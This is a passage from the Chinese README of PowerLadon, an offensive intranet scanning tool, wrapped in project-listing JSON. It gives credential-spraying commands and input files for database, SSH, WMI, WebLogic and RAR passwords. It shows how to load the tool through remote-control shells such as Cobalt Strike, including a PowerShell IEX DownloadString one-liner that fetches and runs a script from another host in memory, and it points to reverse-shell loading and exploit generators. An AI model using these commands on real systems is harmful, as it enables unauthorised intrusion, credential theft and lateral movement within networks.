支持userpass.txt（存放用户名和对应密码）,用于快速验证其它机器是否存在相同帐密\u003cbr\u003e\n3  支持check.txt（存放IP/端口/库名/用户/密码）,不指定端口和数据库名则使用默认\u003cbr\u003e\n\n#### 数据库口令检测\n数据库与其它密码爆破不同，有时数据库做了权限，指定用户只能连指定库，连默认库肯定不行\u003cbr\u003e\n##### mssql密码验证(大型内网可能从其它机器收集到大量机器密码，第一步肯定是先验证)\u003cbr\u003e\n非默认端口请将以下端口改成被修改端口即可，单个IP可直接Ladon IP:端口 MssqlScan扫描\u003cbr\u003e\ncheck.txt\u003cbr\u003e\n192.168.1.8 1433 master sa k8gege\u003cbr\u003e\n192.168.1.8 sa k8gege\u003cbr\u003e\n192.168.1.8 1433 sa k8gege\u003cbr\u003e\n命令: Ladon MssqlScan\u003cbr\u003e\n##### oracle同理\u003cbr\u003e\n192.168.1.8 1521 orcl system k8gege\u003cbr\u003e\n192.168.1.8 orcl system k8gege\u003cbr\u003e\n192.168.1.8 system k8gege\u003cbr\u003e\n命令: Ladon OracleScan\u003cbr\u003e\n##### mysql无需指定数据库名\u003cbr\u003e\n192.168.1.8 3306 root k8gege\u003cbr\u003e\n192.168.1.8 root k8gege\u003cbr\u003e\n命令: Ladon MysqlScan\u003cbr\u003e\n\n##### 系统密码\nSSH\u003cbr\u003e\ncheck.txt\u003cbr\u003e\n192.168.1.8 22 root k8gege\u003cbr\u003e\n192.168.1.8 root k8gege\u003cbr\u003e\n命令: Ladon SshScan\u003cbr\u003e\nSMB/IPC/WMI(直接ip/用户/密码)\u003cbr\u003e\ncheck.txt\n192.168.1.8 root k8gege\u003cbr\u003e\n命令: Ladon WmiScan\u003cbr\u003e\n##### 网站密码\nweblogic\u003cbr\u003e\ncheck.txt(url 用户 密码)\u003cbr\u003e\nhttp://192.168.1.8:7001/console weblogic k8gege\u003cbr\u003e\n命令: Ladon WeblogicScan\u003cbr\u003e\n\n##### 文件密码\n因Rar压缩包只需一个密码,故只需pass.txt,注意中文密码需将txt保存为Ansi编码\u003cbr\u003e\n命令: Ladon test.rar RarScan\u003cbr\u003e\n\n## PowerShell\nPowerLadon完美兼容win7-win10 PowerShell，对于不支持.net程序插件化的远控，可使用\u003cbr\u003e\nPowerShell版,也可CMD命令行下远程加载内存实现无文件扫描，模块加载后用法和EXE一致。\u003cbr\u003e\n\n#### 0x001 PowerShell本地加载\u003cbr\u003e\n适用于支持PowerShell交互远控或Shell，如Cobalt Strike\n```Bash\n\u003e powershell \n\u003e Import-Module .\\Ladon.ps1\n\u003e Ladon OnlinePC\n```\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/PowerLadon.gif\u003e\u003c/img\u003e\n\n#### 0x002 Cmd本地加载\n适用于还没跟上时代的远控或Shell只支持CMD交互\n```bash\n\u003e powershell Import-Module .\\Ladon.ps1;Ladon OnlinePC\n```\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/ps/CmdPSLadon.gif\u003e\u003c/img\u003e\n\n#### 0x003 Cmd远程加载\n适用于还没跟上时代的远控或Shell只支持CMD交互\n```bash\n\u003e powershell \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC\"\n```\n\u003cimg src=https://k8gege.github.io/k8img/Ladon/ps/CmdPSRemoteLadon.gif\u003e\u003c/img\u003e\n\n#### 004 NC反弹SHELL加载Ladon\nhttp://k8gege.org/p/LadonNC.html\n![](http://k8gege.org/k8img/Ladon/gui/NC_PowerLadon.PNG)\n\n### 高级用法\nLadon最初的设计就是一款扫描框架，为了方便才内置功能\u003cbr\u003e\n毕竟需要使用一个功能就得在目标多上传一个文件是顶麻烦的\u003cbr\u003e\n不像MSF框架和模块多大都无所谓，因为你只是在本地使用\u003cbr\u003e\n为了让大家都可以自定义模块，Ladon插件支持多种编程语言\u003cbr\u003e\n最菜可通过INI配置插件，了解HTTP可通过EXP生成器生成POC\u003cbr\u003e\n懂得编程可使用C#、Delphi、VC编写DLL，PowerShell脚本\u003cbr\u003e\n\n#### 0x001 Exp生成器\nEXP生成器教程: https://github.com/k8gege/Ladon/wiki/LadonExp-Usage\u003cbr\u003e\n实战例子: https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2018-2894\n\n#### 0x002 自定义模块教程\n自定义模块教程: https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle\u003cbr\u003e\n\n#### 0x003 插件例子源码\nhttps://github.com/k8gege/Ladon/raw/master/Moudle_Demo.rar\n\n### 注本页面的教程并不是很全，详情请看WIKI,我会慢慢完善\n\n#### [Top](#readme)\n\n## Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/k8gege/PowerLadon.svg)](https://starchart.cc/k8gege/PowerLadon)\n\n\u003cimg align='right' src=\"https://profile-counter.glitch.me/PowerLadon/count.svg\" width=\"200\"\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fk8gege%2Fpowerladon","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fk8gege%2Fpowerladon","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fk8gege%2Fpowerladon/lists"}